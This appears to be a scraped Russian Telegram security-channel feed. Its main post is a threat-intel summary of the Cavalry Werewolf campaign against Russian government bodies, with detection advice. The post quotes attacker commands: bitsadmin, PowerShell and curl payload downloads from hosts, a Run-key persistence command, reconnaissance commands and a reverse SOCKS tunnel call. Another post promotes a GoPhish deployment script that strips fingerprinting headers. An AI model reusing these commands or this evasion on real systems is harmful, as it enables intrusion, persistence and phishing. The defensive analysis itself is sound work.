Forwarded from Threat Hunting Father 🦔
Cavalry Werewolf: целевая атака на госсектор РФ
⚙️ Формат атаки
🎯 Фишинг → архив с паролем («Служебная записка», «План работы почтового сервера») → исполняемый файл с бэкдором BackDoor.ShellNET.1 (на основе Reverse-Shell-CS).
После запуска – обратное соединение с C2 и ручное выполнение команд через cmd.exe.
Через него операторы докачивают новые модули через LOLBAS:
Затем – BackDoor.Tunnel.41 (ReverseSocks5) для создания SOCKS5-туннеля и незаметного удалённого доступа.
🧠 Цели и действия атакующего
Атакующие проводят ручную разведку через cmd.exe:
Загружают новые модули через PowerShell и curl:
🧩 Инструменты Cavalry Werewolf
BackDoor.ShellNET.1 / .2 — C#-бэкдоры (Reverse-Shell-CS, Telegram-бот).
BackDoor.ReverseProxy.1 — ReverseSocks5 (Golang),
Trojan.Inject5.57968 — инжект в
Trojan.Packed2.49708 / Siggen31.54011 — лоадеры Spy-бэкдоров с XOR-дешифровкой.
Trojan.Packed2.49862 — троянизированные программы (WinRAR, 7-Zip, VS Code, AkelPad, SumatraPDF) → доставляют AdaptixC2, Havoc, CobaltStrike, Meterpreter, AsyncRAT.
Trojan.Clipper.808 — крадет криптокошельки, копирует себя в
⛓️💥Типовая цепочка действий
1️⃣ Фишинг → BackDoor.ShellNET (обратный шелл).
2️⃣ Разведка: whoami / ipconfig / net user.
3️⃣ Загрузка новых модулей через bitsadmin, PowerShell или curl.
4️⃣ Закрепление через Run-ключ или планировщик.
5️⃣ Инжект в .NET-процесс, маскировка под легитимный aspnet_compiler.exe.
6️⃣ Создание туннелей и Telegram-C2.
7️⃣ Эксфильтрация документов, удаление следов.
🧠 Тактические наблюдения
Массовое использование open-source (Reverse-Shell-CS, ReverseSocks5, AdaptixC2, Havoc).
Telegram-C2 как универсальный контроль вместо доменов.
Мимикрия под госдокументы и троянизированные программы.
Активная LOLBAS-цепочка:
Хранение и запуск из
Переход от разведки к туннелям и долговременному C2 в одном цикле.
🔍 Что отслеживать
• Исполнение EXE из Public-директорий.
• Bitsadmin с /transfer и URL-адресами.
• PowerShell Invoke-WebRequest → Public-папки.
• Инжект в aspnet_compiler.exe.
• Run-ключи с путём на
• Трафик к api.telegram.org или подозрительным IP
🔗 https://news.drweb.ru/show/?i=15078
🦔 THF
После запуска – обратное соединение с C2 и ручное выполнение команд через cmd.exe.
Через него операторы докачивают новые модули через LOLBAS:
bitsadmin /transfer www /download hxxp://ip/winpot.exe C:\Users\Public\Downloads\winpot.exe
Первым ставится Trojan.FileSpyNET.5 – стилер документов, картинок и txt-файлов → IP/fileupper/getupper.php.Затем – BackDoor.Tunnel.41 (ReverseSocks5) для создания SOCKS5-туннеля и незаметного удалённого доступа.
Атакующие проводят ручную разведку через cmd.exe:
whoami
ipconfig /all
net user
dir C:\Users\<user>\Downloads
dir C:\Users\Public\Pictures
Проверяют сетевые прокси:[System.Net.WebRequest]::DefaultWebProxy.GetProxy("https://google.com")Загружают новые модули через PowerShell и curl:
powershell -Command Invoke-WebRequest -Uri "hxxps://sss.qwadx.com/revv3.exe" -OutFile "C:\Users\Public\Pictures\rev.exe"
curl -o C:\Users\Public\Pictures\rev.exe hxxp://IP/code.exe
Закрепление через Run-ключ:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\Users\Public\Pictures\win.exe /f
Удаление следов: powershell -Command Remove-Item C:\Users\Public\Pictures\732.exe.BackDoor.ShellNET.1 / .2 — C#-бэкдоры (Reverse-Shell-CS, Telegram-бот).
BackDoor.ReverseProxy.1 — ReverseSocks5 (Golang),
revv2.exe -connect IP:10443.Trojan.Inject5.57968 — инжект в
aspnet_compiler.exe, шифрование RC2 / AES, C2.Trojan.Packed2.49708 / Siggen31.54011 — лоадеры Spy-бэкдоров с XOR-дешифровкой.
Trojan.Packed2.49862 — троянизированные программы (WinRAR, 7-Zip, VS Code, AkelPad, SumatraPDF) → доставляют AdaptixC2, Havoc, CobaltStrike, Meterpreter, AsyncRAT.
Trojan.Clipper.808 — крадет криптокошельки, копирует себя в
%APPDATA%\systemservices\svc_host.exe, добавляет Run-ключ SystemServicesHost, сообщает в Telegram-бот о заменённых адресах.⛓️💥Типовая цепочка действий
Массовое использование open-source (Reverse-Shell-CS, ReverseSocks5, AdaptixC2, Havoc).
Telegram-C2 как универсальный контроль вместо доменов.
Мимикрия под госдокументы и троянизированные программы.
Активная LOLBAS-цепочка:
bitsadmin → powershell → cmd.exe.Хранение и запуск из
C:\Users\Public\Pictures|Libraries|Downloads.Переход от разведки к туннелям и долговременному C2 в одном цикле.
• Исполнение EXE из Public-директорий.
• Bitsadmin с /transfer и URL-адресами.
• PowerShell Invoke-WebRequest → Public-папки.
• Инжект в aspnet_compiler.exe.
• Run-ключи с путём на
C:\Users\Public\.• Трафик к api.telegram.org или подозрительным IP
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
Компания AMD выпустила версию ПО Ryzen AI для GNU/Linux
Компания AMD выпустила обновление Ryzen AI Software 1.6.1, добавив начальную поддержку Linux. Ранее пакет был доступен только для Windows. На данный момент официально поддерживается Ubuntu 24.04 LTS.
🔗Ссылка:
https://opennet.ru/64208/
https://opennet.ru/64208/
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Недавно у моего любимого инструмента bloodyAD появился новый модуль
https://github.com/CravateRouge/bloodyAD/wiki/User-Guide#msldap-commands
Кто юзает, обновляйтесь. А если не слышали о bloodyAD, советую попробовать)
#ad #pentest #redteam
msldap. https://github.com/CravateRouge/bloodyAD/wiki/User-Guide#msldap-commands
Кто юзает, обновляйтесь. А если не слышали о bloodyAD, советую попробовать)
#ad #pentest #redteam
www.opennet.ru
Атака Whisper Leak по определению тематики общения с AI-чатботами через анализ TLS-трафика
Исследователи безопасности из компании Microsoft разработали технику атаки по сторонним каналам Whisper Leak, позволяющую на основе пассивного анализа шифрованного трафика, передаваемого через TLS-соединение, классифицировать темы запросов к сервисам на базе…
🔗Ссылка:
https://opennet.ru/64218/
https://opennet.ru/64218/
Forwarded from s0ld13r ch. (s0ld13r)
gophish-auto v0.1 📥
Порой разворачивание серваков и прочие рутинные задачи сильно тормозят работу, решил написать небольшой Ansible Playbook и One-Shot bash скрипт для автоматического деплоя GoPhish😃
Features🤩
• Удаляет/заменяет заметные хэдеры (X-GoPhish-Contact → X-Contact-Address, X-GoPhish-Signature → X-Sender-Signature)
• Меняет дефолтный server name и rid, чтобы снизить «отпечаток» сервера
• Клонирует репо, билдит на хосте и поднимает systemd-сервис
• Поддерживает массовую установку через Ansible inventory - закинул креды в hosts и запустил
Usage👀
Планы на следующие релизы🔍
• Автоматическая прокидка порта / secure proxy до admin UI (safe internet access)
• Генерация config.json из шаблонов, TLS (Certbot) и небольшие улучшения в скрипте
💻 Repo: https://github.com/s0ld13rr/gophish-auto
P.S Use only for authorized red team & security awareness assessments
🧢 s0ld13r
Порой разворачивание серваков и прочие рутинные задачи сильно тормозят работу, решил написать небольшой Ansible Playbook и One-Shot bash скрипт для автоматического деплоя GoPhish
Features
• Удаляет/заменяет заметные хэдеры (X-GoPhish-Contact → X-Contact-Address, X-GoPhish-Signature → X-Sender-Signature)
• Меняет дефолтный server name и rid, чтобы снизить «отпечаток» сервера
• Клонирует репо, билдит на хосте и поднимает systemd-сервис
• Поддерживает массовую установку через Ansible inventory - закинул креды в hosts и запустил
Usage
ansible-playbook -i ansible/example.hosts ansible/deploy-gophish.yml
Планы на следующие релизы
• Автоматическая прокидка порта / secure proxy до admin UI (safe internet access)
• Генерация config.json из шаблонов, TLS (Certbot) и небольшие улучшения в скрипте
P.S Use only for authorized red team & security awareness assessments
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
www.opennet.ru
Выпуск Apache OpenOffice 4.1.16 с устранением переполнения буфера при обработке CSV-файлов
После почти двух лет с момента прошлого обновления опубликован корректирующий релиз офисного пакета Apache OpenOffice 4.1.16, в котором устранено 7 уязвимостей и исправлено несколько ошибок. Готовые пакеты подготовлены для Linux, Windows и macOS.
🔗Ссылка:
https://opennet.ru/64225/
https://opennet.ru/64225/
www.opennet.ru
Обновление sudo-rs 0.2.10 с исправлением двух уязвимостей
Опубликован выпуск проекта sudo-rs 0.2.10, развивающего написанные на языке Rust варианты утилит sudo и su. Новая версия примечательна исправлением двух уязвимостей, которые проявляются среди прочего в дистрибутиве Ubuntu 25.10, в котором sudo-rs задействован…
🔗Ссылка:
https://opennet.ru/64226/
https://opennet.ru/64226/